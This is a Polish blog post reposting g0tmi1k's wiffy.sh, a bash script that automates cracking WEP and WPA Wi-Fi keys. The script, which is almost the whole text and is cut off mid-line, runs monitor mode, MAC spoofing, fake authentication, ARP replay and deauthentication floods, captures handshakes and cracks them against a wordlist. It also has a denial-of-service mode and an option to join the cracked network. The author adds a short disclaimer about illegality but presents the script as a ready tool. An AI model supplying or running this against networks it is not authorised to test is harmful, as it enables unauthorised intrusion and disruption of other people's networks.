Na początku chciałbym zaznaczyć że takie łamanie zabezpieczeń jest nielegalne, i czynisz tym zło.
Jednak dla sprawdzenia naszej sieci, pod względem „truności” złamania naszego hasła polecam ten skrypt! ]:->

Chciałbym pokazać wam skrypt pewnej osoby zwanej w internecie : g0tmi1k
Musze powiedzieć że  chłopak zna się na sieciach, i na bashu .. Za pomocą tego skryptu możemy złamać zabezpieczenie WEP swojej sieci w kilka sekund czy minut ( W zależności od złożoności hasła ).

What we need?
– Karte sieciową,
– Skrypt wiffy.sh
– Słownik w przypadku chęci złamania WPA/WPA2

How to use it?
– Uruchamiamy skrypt poprzez konsolę,  ( Wcześniej edytujemy skrypt dla naszego interfejsu, np. wlan0 )
– Czekamy.. gotowe.

Praktycznie i teoretycznie na tym koniec. Mogę się pochwalić że „mój” WEP udało się złamać i to bardzo sprawnie.

Skrypt:

#!/bin/bash
#----------------------------------------------------------------------------------------------#
#wiffy.sh v0.1 (#5 2010-09-13)                                 #
# (C)opyright 2010 - g0tmi1k                                  #
#---License------------------------------------------------------------------------------------#
# This program is free software: you can redistribute it and/or modify it under the terms   #
# of the GNU General Public License as published by the Free Software Foundation, either   #
# version 3 of the License, or (at your option) any later version.              #
#                                               #
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;  #
# without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  #
# See the GNU General Public License for more details.                    #
#                                               #
# You should have received a copy of the GNU General Public License along with this program. #
# If not, see <http://www.gnu.org/licenses/>.                         #
#---Important----------------------------------------------------------------------------------#
#           *** Do NOT use this for illegal or malicious use ***           #
#---Defaults-----------------------------------------------------------------------------------#
# The interfaces you use
interface="wlan0"
 
# [crack/dos] Crack - cracks WiFi Keys, dos - blocks access to ap.
mode="crack"
 
# 
	
	

Change the MAC address
macMode="set" fakeMac="00:05:7c:9a:58:3f"   # [/path/to/the/folder] The file used to brute force WPA keys. wordlist="/pentest/passwords/wordlists/wpa.txt"   # [true/false] Connect to network afterwords extras="false"   # [true/false] diagnostics = Creates a output file displays exactly whats going on. [0/1/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands diagnostics="false" verbose="0"   #---Variables----------------------------------------------------------------------------------# version="0.1 (#5)" # Version monitorInterface="mon0" # Default bssid="" # null the value essid="" # null the value channel="" # null the value client="" # null the value debug="false" # Windows don't close, shows extra stuff logFile="wiffy.log" # filename of output trap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)   #----Functions---------------------------------------------------------------------------------# function findAP () { #findAP action "Scanning network" "rm -f /tmp/wiffy.tmp && iwlist $interface scan > /tmp/wiffy.tmp" $verbose $diagnostics "true" #arrayESSID=( $(cat /tmp/wiffy.tmp | awk -F":" '/ESSID/{print $2}') ) arrayBSSID=( $(cat /tmp/wiffy.tmp | grep "Address:" | awk '{print $5}\') ) arrayChannel=( $(cat /tmp/wiffy.tmp | grep "Channel:" | tr ':' ' ' | awk '{print $2}\') ) arrayProtected=( $(cat /tmp/wiffy.tmp | grep "key:" | sed 's/.*key://g') ) arrayQuality=( $(cat /tmp/wiffy.tmp | grep "Quality" | sed 's/.*Quality=//g' | awk -F " " '{print $1}' ) )   id="" index="0" for item in "${arrayBSSID[@]}"; do if [ "$bssid" ] && [ "$bssid" == "$item" ] ; then id="$index" ;fi command=$(cat /tmp/wiffy.tmp | sed -n "/$item/, +20p" | grep "WPA" ) if [ "$command" ] ; then arrayEncryption[$index]="WPA" elif [ ${arrayProtected[$index]} == "off" ] ; then arrayEncryption[$index]="N/A" else arrayEncryption[$index]="WEP" ; fi index=$(($index+1)) done   #-Cheap hack to support essids with spaces in----------------------------------------------------------- cat /tmp/wiffy.tmp | awk -F":" '/ESSID/{print $2}' | sed 's/\"//' | sed 's/\(.*\)\"/\1/' > /tmp/wiffy.ssid index="0" while read line ; do if [ "$essid" ] && [ "$essid" == "$line" ] ; then id="$index" ; fi arrayESSID[$index]="$line" index=$(($index+1)) done < "/tmp/wiffy.ssid" rm -f /tmp/wiffy.ssid #-------------------------------------------------------------------------------------------------------------- } function findClient () { #findClient $encryption if [ -z "$1" ] ; then error="1" ; fi # Coding error if [ "$error" == "free" ] ; then client="" action "Removing temp files" "rm -f /tmp/wiffy.dump* && sleep 1" $verbose $diagnostics "true" action "airodump-ng (client(s))" "airodump-ng --bssid $bssid --channel $channel --write /tmp/wiffy.dump --output-format netxml $monitorInterface" $verbose $diagnostics "true" & sleep 3   if [ "$1" == "WEP" ] || [ "$1" == "N/A" ] ; then # N/A = For MAC filtering sleep 5 client=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "client-mac" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' | head -1) elif [ "$1" == "WPA" ] ; then while [ -z "$client" ] ; do sleep 2 client=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "client-mac" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/' | head -1) done fi   if [ -z "$essid" ] ; then essid=$(cat "/tmp/wiffy.dump-01.kismet.netxml" | grep "<essid cloaked=\"false\">" | tr -d '\t' | sed 's/^<.*>\([^<].*\)<.*>$/\1/') if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "*hidden* essid=$essid" $diagnostics ; fi fi   command=$(ps aux | grep "airodump-ng" | awk '!/grep/ && !/awk/ && !/cap/ {print $2}' | while read line; do echo -n "$line "; done | awk '{print}') if [ -n "$command" ] ; then action "Killing programs" "kill $command" $verbose $diagnostics "true" sleep 1 fi   action "Removing temp files" "rm -f /tmp/wiffy.dump*" $verbose $diagnostics "true" if [ "$client" == "" ] ; then client="clientless" ; fi if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "client=$client" $diagnostics ; fi return 0 else display error "findClient. Error code: $error" $diagnostics 1>&2 return 1 fi } function update() { # update if [ -e "/usr/bin/svn" ] ; then display action "Checking for an update..." $diagnostics update=$(svn info http://g0tmi1k.googlecode.com/svn/trunk/wiffy/ | grep "Last Changed Rev:" |cut -c11-) if [ "$version" != "0.3 (#$update)" ] ; then display info "Updating..." $diagnostics svn export -q --force http://g0tmi1k.googlecode.com/svn/trunk/wiffy/wiffy.sh wiffy.sh display info "Updated to $update. (=" $diagnostics else display info "You're using the latest version. (=" $diagnostics fi else display info "Updating..." $diagnostics wget -nv -N http://g0tmi1k.googlecode.com/svn/trunk/wiffy/wiffy.sh display info "Updated! (=" $diagnostics fi echo exit 2 } function cleanup() { # cleanup mode if [ "$1" == "nonuser" ] ; then exit 3 ; fi   action "Killing xterm" "killall xterm" $verbose $diagnostics "true" if [ "$1" != "clean" ] ; then echo # Blank line if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "*** BREAK ***" $diagnostics ; fi # User quit fi display action "Restoring: Environment" $diagnostics   command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}') if [ "$command" == "$monitorInterface" ] ; then sleep 3 # Sometimes it needs to catch up/wait action "Monitor Mode (Stopping)" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true" fi   if [ "$debug" != "true" ] ; then command="" tmp=$(ls /tmp/wiffy-*.cap 2> /dev/null) if [ "$tmp" ] ; then command="$command /tmp/wiffy-*" ; fi tmp=$(ls /tmp/wiffy.dump*.netxml 2> /dev/null) if [ "$tmp" ] ; then command="$command /tmp/wiffy.dump*" ; fi tmp=$(ls replay_arp*.cap 2> /dev/null) if [ "$tmp" ] ; then command="$command replay_arp*.cap" ; fi if [ -e "/tmp/wiffy.key" ] ; then command="$command /tmp/wiffy.key" ; fi if [ -e "/tmp/wiffy.tmp" ] ; then command="$command /tmp/wiffy.tmp" ; fi if [ -e "/tmp/wiffy.conf" ] ; then command="$command /tmp/wiffy.conf" ; fi if [ -e "/tmp/wiffy.handshake" ] ; then command="$command /tmp/wiffy.handshake" ; fi if [ ! -z "$command" ] ; then action "Removing temp files" "rm -rfv $command" $verbose $diagnostics "true" ; fi fi   echo -e "\e[01;36m[*]\e[00m Done! (= Have you... g0tmi1k?" exit 0 } function help() { echo "(C)opyright 2010 g0tmi1k ~ http://g0tmi1k.blogspot.com   Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack/dos] -e [essid] -b [bssid] -c [mac] -w [/path/to/file] (-z / -s [mac]) -x -d (-v / -V) ([-u] [-?])   Options: -i --- Internet Interface e.g. $interface -t --- Monitor Interface e.g. $monitorInterface   -m --- Mode. e.g. $mode   -e --- ESSID (WiFi Name) -b --- BSSID (AP MAC Address) -c --- Client that is connect to the acess point   -w --- Path to Wordlist e.g. $wordlist   -z --- Change interface's MAC Address e.g. $macMode -s --- Use this MAC Address e.g. $fakeMac   -x --- Connect to network afterwords   -d --- Diagnostics (Creates output file, $logFile) -v --- Verbose (Displays more) -V --- (Higher) Verbose (Displays more + shows commands)   -u --- Update -? --- This       Known issues: -WEP > Didn't detect my client + Add it in manually + Re-run the script > IV's doesn't increae + DeAuth didn't work --- Client using Windows 7? + Use a different router/client   -WPA > You can ONLY crack WPA when: + The ESSID is known + The WiFi key is in the word-list + There is a connected client   -Doesn't detect any/my wireless network > Don't run from a virtual machine > Driver issue - Use a different WiFi device > Try the 're[f]resh' option > Unplug WiFi device, wait, replug > You're too close/far away   -\"Extras\" doesn't work > Network doesn't have a DHCP server   -Slow > Try a different attack... manually! " exit 1 } function action() { # action title command $verbose $diagnostics screen&file x|y|lines hold error="free" if [ -z "$1" ] || [ -z "$2" ] ; then error="1" ; fi # Coding error if [ "$error" == "free" ] ; then xterm="xterm" #Defaults command=$2 x="100" y="0" lines="15" if [ "$7" == "hold" ] ; then xterm="$xterm -hold" ; fi if [ "$3" == "2" ] ; then echo "Command: $command" ; fi if [ "$4" == "true" ] ; then echo "$1~$command" >> $logFile ; fi if [ "$4" == "true" ] && [ "$5" == "true" ] ; then command="$command | tee -a $logFile" ; fi if [ ! -z "$6" ] ; then x=$(echo $6 | cut -d'|' -f1) y=$(echo $6 | cut -d'|' -f2) lines=$(echo $6 | cut -d'|' -f3) fi $xterm -geometry 100x$lines+$x+$y -T "wiffy v$version - $1" -e "$command" return 0 else display error "action. Error code: $error" $diagnostics 1>&2 echo -e "---------------------------------------------------------------------------------------------\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7" >> $logFile ; return 1 fi } function display() { # display type message $diagnostics error="free" if [ -z "$1" ] || [ -z "$2" ] ; then error="1" ; fi # Coding error if [ "$1" != "action" ] && [ "$1" != "info" ] && [ "$1" != "diag" ] && [ "$1" != "error" ] ; then error="5"; fi # Coding error if [ "$error" == "free" ] ; then output="" if [ "$1" == "action" ] ; then output="\e[01;32m[>]\e[00m" ; fi if [ "$1" == "info" ] ; then output="\e[01;33m[i]\e[00m" ; fi if [ "$1" == "diag" ] ; then output="\e[01;34m[+]\e[00m" ; fi if [ "$1" == "error" ] ; then output="\e[01;31m[-]\e[00m" ; fi output="$output $2" echo -e "$output" if [ "$3" == "true" ] ; then if [ "$1" == "action" ] ; then output="[>]" ; fi if [ "$1" == "info" ] ; then output="[i]" ; fi if [ "$1" == "diag" ] ; then output="[+]" ; fi if [ "$1" == "error" ] ; then output="[-]" ; fi echo -e "---------------------------------------------------------------------------------------------\n$output $2" >> $logFile fi return 0 else display error "display. Error code: $error" $logFile 1>&2 echo -e "---------------------------------------------------------------------------------------------\n-->ERROR: display (Error code: $error): $1 , $2 , $3 " >> $logFile ; return 1 fi }     #----------------------------------------------------------------------------------------------# echo -e "\e[01;36m[*]\e[00m wiffy v$version"   #----------------------------------------------------------------------------------------------# while getopts "i:t:m:e:b:c:w:z:s:xdvVu?" OPTIONS; do case ${OPTIONS} in i ) interface=$OPTARG;; t ) monitorInterface=$OPTARG;; m ) mode=$OPTARG;; e ) essid=$OPTARG;; b ) bssid=$OPTARG;; c ) client=$OPTARG;; w ) wordlist=$OPTARG;; z ) macMode=$OPTARG;; s ) fakeMac=$OPTARG;; x ) extras="true";; d ) diagnostics="true";; v ) verbose="1";; V ) verbose="2";; u ) update;; ? ) help;; * ) display error "Unknown option." $diagnostics 1>&2 ;; # Default esac done   #----------------------------------------------------------------------------------------------# if [ "$debug" == "true" ] ; then display info "Debug mode" $diagnostics fi if [ "$diagnostics" == "true" ] ; then display diag "Diagnostics mode" $diagnostics echo -e "wiffy v$version\n$(date)" > $logFile echo "wiffy.sh" $* >> $logFile fi   #----------------------------------------------------------------------------------------------# display action "Analyzing: Environment" $diagnostics   #----------------------------------------------------------------------------------------------# if [ "$(id -u)" != "0" ] ; then display error "Not a superuser." $diagnostics 1>&2 ; cleanup nonuser; fi   #----------------------------------------------------------------------------------------------# command="" tmp=$(ls /tmp/wiffy-*.cap 2> /dev/null) if [ "$tmp" ] ; then command="$command /tmp/wiffy-*" ; fi tmp=$(ls /tmp/wiffy.dump*.netxml 2> /dev/null) if [ "$tmp" ] ; then command="$command /tmp/wiffy.dump*" ; fi tmp=$(ls replay_arp*.cap 2> /dev/null) if [ "$tmp" ] ; then command="$command replay_arp*.cap" ; fi if [ -e "/tmp/wiffy.key" ] ; then command="$command /tmp/wiffy.key" ; fi if [ -e "/tmp/wiffy.tmp" ] ; then command="$command /tmp/wiffy.tmp" ; fi if [ -e "/tmp/wiffy.conf" ] ; then command="$command /tmp/wiffy.conf" ; fi if [ -e "/tmp/wiffy.handshake" ] ; then command="$command /tmp/wiffy.handshake" ; fi if [ ! -z "$command" ] ; then action "Removing old files" "rm -rfv $command" $verbose $diagnostics "true" ; fi   #----------------------------------------------------------------------------------------------# if [ -z "$interface" ] ; then display error "interface can't be blank" $diagnostics 1>&2 ; cleanup; fi if [ -z "$monitorInterface" ] ; then display error "monitorInterface can't be blank" $diagnostics 1>&2 ; cleanup; fi if [ "$mode" != "crack" ] && [ "$mode" != "dos" ] ; then display error "mode ($mode) isn't correct" $diagnostics 1>&2 ; cleanup; fi if [ ! -e "$wordlist" ] ; then display error "There isn't a wordlist at $wordlist" $diagnostics 1>&2 ; cleanup; fi if [ "$macMode" != "random" ] && [ "$macMode" != "set" ] && [ "$macMode" != "false" ] ; then display error "macMode ($macMode) isn't correct" $diagnostics 1>&2 ; cleanup; fi if [ "$macMode" == "set" ] ; then if [ -z "$fakeMac" ] || [ ! $(echo $fakeMac | egrep "^([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}$") ] ; then display error "fakeMac ($fakeMac) isn't correct" $diagnostics 1>&2 ; cleanup; fi ; fi if [ "$mode" == "crack" ] && [ "$extras" != "true" ] && [ "$extras" != "false" ] ; then display error "extras ($extras) isn't correct" $diagnostics 1>&2 ; cleanup; fi if [ "$diagnostics" != "true" ] && [ "$diagnostics" != "false" ] ; then display error "diagnostics ($diagnostics) isn't correct" $diagnostics 1>&2 ; cleanup; fi if [ "$verbose" != "0" ] && [ "$verbose" != "1" ] && [ "$verbose" != "2" ] ; then display error "verbose ($verbose) isn't correct" $diagnostics 1>&2 ; cleanup; fi if [ -z "$version" ] ; then display error "version ($version) isn't correct" $diagnostics 1>&2 ; cleanup; fi if [ "$debug" != "true" ] && [ "$debug" != "false" ] ; then display error "debug ($debug) isn't correct" $diagnostics 1>&2 ; cleanup; fi if [ "$diagnostics" == "true" ] && [ -z "$logFile" ] ; then display error "logFile ($logFile) isn't correct" $diagnostics 1>&2 ; cleanup ; fi   #----------------------------------------------------------------------------------------------# command=$(iwconfig $interface 2>/dev/null | grep "802.11" | cut -d" " -f1) if [ ! $command ]; then display error "$interface isn't a wireless interface." $diagnostics display info "Searching for a wireless interface" $diagnostics command=$(iwconfig 2>/dev/null | grep "802.11" | cut -d" " -f1) #| awk '!/"'"$interface"'"/' if [ $command ] ; then interface=$command display info "Found $interface" $diagnostics else display error "Couldn't find a wireless interface." $diagnostics 1>&2 cleanup fi fi   command=$(ifconfig -a | grep $interface | awk '{print $1}') if [ "$command" != "$interface" ] ; then display error "The wireless interface $interface, isn't correct." $diagnostics 1>&2 if [ "$debug" == "true" ] ; then iwconfig; fi cleanup fi   #----------------------------------------------------------------------------------------------# mac=$(macchanger --show $interface | awk -F " " '{print $3}')   #----------------------------------------------------------------------------------------------# if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Stopping: Programs" $diagnostics ; fi command=$(ps aux | grep $interface | awk '!/grep/ && !/awk/ && !/wiffy/ {print $2}' | while read line; do echo -n "$line "; done | awk '{print}') if [ -n "$command" ] ; then action "Killing programs" "kill $command" $verbose $diagnostics "true" # to prevent interference fi action "Killing 'Programs'" "killall wicd-client airodump-ng xterm" $verbose $diagnostics "true" # Killing "wicd-client" to prevent channel hopping action "Killing 'wicd service'" "/etc/init.d/wicd stop" $verbose $diagnostics "true" # Stopping wicd to prevent channel hopping   #----------------------------------------------------------------------------------------------# action "Refreshing interface" "ifconfig $interface down && ifconfig $interface up && sleep 1" $verbose $diagnostics "true" loopMain="false" while [ "$loopMain" != "true" ] ; do findAP if [ "$id" ] ; then loopMain="true" else if [ "$essid" ] ; then display error "Couldnt find essid ($essid)" $diagnostics 1>&2 ; fi if [ "$bssid" ] ; then display error "Couldnt find bssid ($bssid)" $diagnostics 1>&2 ; fi loop=${#arrayBSSID[@]} echo -e " Num | ESSID | BSSID | Protected | Cha | Quality\n-----|------------------------|-------------------|-----------|-----|---------" for (( i=0;i<$loop;i++)); do printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\n' "$(($i+1))" "${arrayESSID[${i}]}" "${arrayBSSID[${i}]}" "${arrayProtected[${i}]}" "${arrayEncryption[${i}]}" "${arrayChannel[${i}]}" "${arrayQuality[${i}]}" done loopSub="false" while [ "$loopSub" != "true" ] ; do read -p "[~] re[s]can, re[f]resh, e[x]it or select num: " if [ "$REPLY" == "x" ] ; then cleanup clean elif [ "$REPLY" == "s" ] ; then loopSub="true" # aka do nothing elif [ "$REPLY" == "f" ] ; then action "Refreshing interface" "ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1" $verbose $diagnostics "true" && loopSub="true" # aka do nothing elif [ -z $(echo "$REPLY" | tr -dc '[:digit:]'l) ] ; then display error "Bad input, $REPLY" $diagnostics 1>&2 elif [ "$REPLY" -lt 1 ] || [ "$REPLY" -gt $loop ] ; then display error "Incorrect number, $REPLY" $diagnostics 1>&2 else id="$(($REPLY-1))" ; loopSub="true" ; loopMain="true" fi done fi done essid="${arrayESSID[$id]}" bssid="${arrayBSSID[$id]}" channel="${arrayChannel[$id]}" encryption="${arrayEncryption[$id]}"   #----------------------------------------------------------------------------------------------# if [ "$diagnostics" == "true" ] ; then echo "-Settings------------------------------------------------------------------------------------ interface=$interface monitorInterface=$monitorInterface mode=$mode essid=$essid bssid=$bssid encryption=$encryption channel=$channel client=$client wordlist=$wordlist mac=$mac macMode=$macMode fakeMac=$fakeMac diagnostics=$diagnostics verbose=$verbose debug=$debug -Environment---------------------------------------------------------------------------------" >> $logFile display diag "Detecting: Kernal" $diagnostics uname -a >> $logFile display diag "Detecting: Hardware" $diagnostics lspci -knn >> $logFile fi if [ "$debug" == "true" ] || [ "$verbose" != "0" ] ; then display info " interface=$interface \e[01;33m[i]\e[00m monitorInterface=$monitorInterface \e[01;33m[i]\e[00m mode=$mode \e[01;33m[i]\e[00m essid=$essid \e[01;33m[i]\e[00m bssid=$bssid \e[01;33m[i]\e[00m encryption=$encryption \e[01;33m[i]\e[00m channel=$channel \e[01;33m[i]\e[00m client=$client \e[01;33m[i]\e[00m wordlist=$wordlist \e[01;33m[i]\e[00m mac=$mac \e[01;33m[i]\e[00m macMode=$macMode \e[01;33m[i]\e[00m fakeMac=$fakeMac \e[01;33m[i]\e[00m diagnostics=$diagnostics \e[01;33m[i]\e[00m verbose=$verbose \e[01;33m[i]\e[00m debug=$debug" fi   #----------------------------------------------------------------------------------------------# if [ ! -e "/usr/sbin/airmon-ng" ] && [ ! -e "/usr/local/sbin/airmon-ng" ] ; then display error "aircrack-ng isn't installed." $diagnostics 1>&2 read -p "[~] Would you like to try and install it? [Y/n]: " -n 1 if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install aircrack-ng" "apt-get -y install aircrack-ng" $verbose $diagnostics "true" ; fi if [ ! -e "/usr/sbin/airmon-ng" ] && [ ! -e "/usr/local/sbin/airmon-ng" ] ; then display error "Failed to install aircrack-ng" $diagnostics 1>&2 ; cleanup else display info "Installed aircrack-ng" $diagnostics fi fi if [ ! -e "/usr/bin/macchanger" ] ; then display error "macchanger isn't installed." $diagnostics read -p "[~] Would you like to try and install it? [Y/n]: " -n 1 if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install macchanger" "apt-get -y install macchanger" $verbose $diagnostics "true" ; fi if [ ! -e "/usr/bin/macchanger" ] ; then display error "Failed to install macchanger" $diagnostics 1>&2 ; cleanup else display info "Installed macchanger" $diagnostics fi fi #if [ "$attack" == "inject" ] ; then # if [ ! -e "/pentest/wireless/airpwn-1.4/airpwn" ] ; then # display error "airpwn isn't installed." $diagnostics # read -p "[~] Would you like to try and install it? [Y/n]: " -n 1 # if [[ $REPLY =~ ^[Yy]$ ]] ; then action "Install airpwn" "apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev" $verbose $diagnostics "true" ; fi # action "Install airpwn" "wget -P /tmp http://downloads.sourceforge.net/project/airpwn/airpwn/1.4/airpwn-1.4.tgz && tar -C /pentest/wireless -xvf /tmp/airpwn-1.4.tgz && rm /tmp/airpwn-1.4.tgz" $verbose $diagnostics "true" # find="#include <linux/if.h>\n#ifndef _LINUX_WIRELESS_H" # replace="#ifndef _LINUX_WIRELESS_H" # sed "s/$find/$replace/g" "/usr/include/linux/wireless.h" > "/usr/include/linux/wireless.h.new" # find="#ifndef _LINUX_WIRELESS_H" # replace="#include <linux/if.h>\n#ifndef _LINUX_WIRELESS_H" # sed "s/$find/$replace/g" "/usr/include/linux/wireless.h.new" > "/usr/include/linux/wireless.h" # rm -f "/usr/include/linux/wireless.h.new" # action "Install airpwn" "command=$(pwd) && tar -C /pentest/wireless/airpwn-1.4 -xvf /pentest/wireless/airpwn-1.4/lorcon-current.tgz && cd /pentest/wireless/airpwn-1.4/lorcon && ./configure && make && make install && cd $command" $verbose $diagnostics "true" # action "Install airpwn" "command=$(pwd) && cd /pentest/wireless/airpwn-1.4 && ./configure && make && cd $command" $verbose $diagnostics "true" # if [ ! -e "/pentest/wireless/airpwn-1.4/airpwn" ] ; then # display error "Failed to install airpwn" $diagnostics 1>&2 ; cleanup # else # display info "Installed airpwn" $diagnostics # fi # fi #fi   #----------------------------------------------------------------------------------------------# display action "Configuring: Environment" $diagnostics   #----------------------------------------------------------------------------------------------# if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Configuring: Wireless card" $diagnostics ; fi command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}') if [ "$command" == "$monitorInterface" ] ; then action "Monitor Mode (Stopping)" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true" sleep 1 fi   action "Monitor Mode (Starting)" "airmon-ng start $interface | awk '/monitor mode enabled on/ {print \$5}' | tr -d '\011' | sed -e \"s/(monitor mode enabled on //\" | sed 's/\(.*\)./\1/' > /tmp/wiffy.tmp" $verbose $diagnostics "true" command=$(cat /tmp/wiffy.tmp) if [ "$monitorInterface" != "$command" ] ; then if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display info "Configuring: Chaning monitorInterface to: $command" $diagnostics fi monitorInterface=$command fi   command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}') if [ "$command" != "$monitorInterface" ] ; then sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it! command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}') if [ "$command" != "$monitorInterface" ] ; then display error "The monitor interface $monitorInterface, isn't correct." $diagnostics 1>&2 if [ "$debug" == "true" ] ; then iwconfig; fi cleanup fi fi   #----------------------------------------------------------------------------------------------# if [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display diag "Testing: Wireless Injection" $diagnostics command=$(aireplay-ng --test $monitorInterface -i $monitorInterface) if [ "$diagnostics" == "true" ] ; then echo -e $command >> $logFile ; fi if [ -z "$(echo \"$command\" | grep 'Injection is working')" ] ; then display error "$monitorInterface doesn't support packet injecting." $diagnostics 1>&2 elif [ -z "$(echo \"$command\" | grep 'Found 0 APs')" ] ; then display error "Couldn't test packet injection" $diagnostics 1>&2 ; fi fi   #----------------------------------------------------------------------------------------------# if [ "$macMode" != "false" ] ; then if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Configuring: MAC address" $diagnostics ; fi command="ifconfig $monitorInterface down &&" if [ "$macMode" == "random" ] ; then command="$command macchanger -A $monitorInterface &&"; fi if [ "$macMode" == "set" ] ; then command="$command macchanger -m $fakeMac $monitorInterface &&"; fi command="$command ifconfig $monitorInterface up" action "Configuring: MAC address" "$command" $verbose $diagnostics "true" sleep 2 mac="$fakeMac" fi   #----------------------------------------------------------------------------------------------# if [ "$mode" == "crack" ] ; then if [ -z "$client" ] ; then display action "Detecting: Client(s)" $diagnostics findClient $encryption fi   #----------------------------------------------------------------------------------------------# display action "Starting: airodump-ng" $diagnostics action "Removing temp files" "rm -f /tmp/wiffy* && sleep 1" $verbose $diagnostics "true" action "airodump-ng" "airodump-ng --bssid $bssid --channel $channel --write /tmp/wiffy --output-format cap $monitorInterface" $verbose $diagnostics "true" "0|0|13" & # Don't wait, do the next command sleep 1   #----------------------------------------------------------------------------------------------# if [ "$encryption" == "WEP" ] ; then if [ "$client" == "clientless" ] ; then display action "Attack (FakeAuth): $fakeMac" $diagnostics action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 0 -e \"$essid\" -a $bssid -h $mac $monitorInterface" $verbose $diagnostics "true" #action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 30 -o 1 -q 10 -e \"$essid\" -a $bssid -h $fakeMac $monitorInterface" $verbose $diagnostics "true" #if [Association successful] = then client=$mac sleep 1 fi display action "Attack (ARPReplay+Deauth): $client" $diagnostics action "aireplay-ng (arpreplay)" "aireplay-ng --arpreplay -e \"$essid\" -b $bssid -h $client $monitorInterface" $verbose $diagnostics "true" "0|195|10" & # Don't wait, do the next command sleep 1 action "aireplay-ng (deauth)" "aireplay-ng --deauth 5 -e \"$essid\" -a $bssid -c $fakeMac $monitorInterface" $verbose $diagnostics "true" sleep 1 if [ "$client" == "$mac" ] ; then sleep 20 && action "aireplay-ng (fakeauth)" "aireplay-ng --fakeauth 0 -e \"$essid\" -a $bssid -h $fakeMac $monitorInterface" $verbose $diagnostics "true" ; fi sleep 60   #----------------------------------------------------------------------------------------------# elif [ "$encryption" == "WPA" ] ; then display action "Capturing: Handshake" $diagnostics loop="0" # 0 = first, 1 = client, 2 = everyone echo "g0tmi1k" > /tmp/wiffy.tmp for (( ; ; )) ; do action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -w /tmp/wiffy.tmp -e \"$essid\" > /tmp/wiffy.handshake" $verbose $diagnostics "true" command=$(cat /tmp/wiffy.handshake | grep "Passphrase not in dictionary" ) #Got no data packets from client network & No valid WPA handshakes found if [ "$command" ] ; then break; fi sleep 2 if [ "$loop" != "1" ] ; then if [ "$loop" != "0" ] ; then findClient $encryption ; fi sleep 1 if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Deauth): $client" $diagnostics ; fi action "aireplay-ng" "aireplay-ng --deauth 5 -a $bssid -c $client mon0" $verbose $diagnostics "true" loop="1" else if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Deauth): *everyone*" $diagnostics ; fi action "aireplay-ng" "aireplay-ng --deauth 5 -a $bssid mon0" $verbose $diagnostics "true" loop="2" fi sleep 1 done if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Captured: Handshake" $diagnostics ; fi action "Killing programs" "killall xterm && sleep 1" $verbose $diagnostics "true" fi   #----------------------------------------------------------------------------------------------# if [ "$encryption" == "WEP" ] || [ "$encryption" == "WPA" ] ; then display action "Starting: aircrack-ng" $diagnostics if [ "$encryption" == "WEP" ] ; then action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -e \"$essid\" -l /tmp/wiffy.key" $verbose $diagnostics "false" "0|350|30" ; fi if [ "$encryption" == "WPA" ] ; then action "aircrack-ng" "aircrack-ng /tmp/wiffy*.cap -w $wordlist -e \"$essid\" -l /tmp/wiffy.key" $verbose $diagnostics "false" "0|0|20" ; fi fi   #----------------------------------------------------------------------------------------------# action "Killing programs" "killall xterm && sleep 1" $verbose $diagnostics "true" action "airmon-ng" "airmon-ng stop $monitorInterface" $verbose $diagnostics "true"   #----------------------------------------------------------------------------------------------# if [ -e "/tmp/wiffy.key" ] ; then key=$(cat /tmp/wiffy.key) display info "WiFi key: $key" $diagnostics #----------------------------------------------------------------------------------------------# if [ "$extras" == "true" ] ; then if [ "$client" != "$mac" ] ; then if [ "$verbose" != "0" ] || [ "$diagnostics" == "true" ] || [ "$debug" == "true" ] ; then display action "Attack (Spoofing): $client ('Helps' with MAC filtering) " $diagnostics ; fi action "airmon-ng" "ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up" $verbose $diagnostics "true" fi display action "Joining: $essid" $diagnostics if [ "$encryption" == "WEP" ] ; then action "i[f/w]config" "ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up" $verbose $diagnostics "true" elif [ "$encryption" == 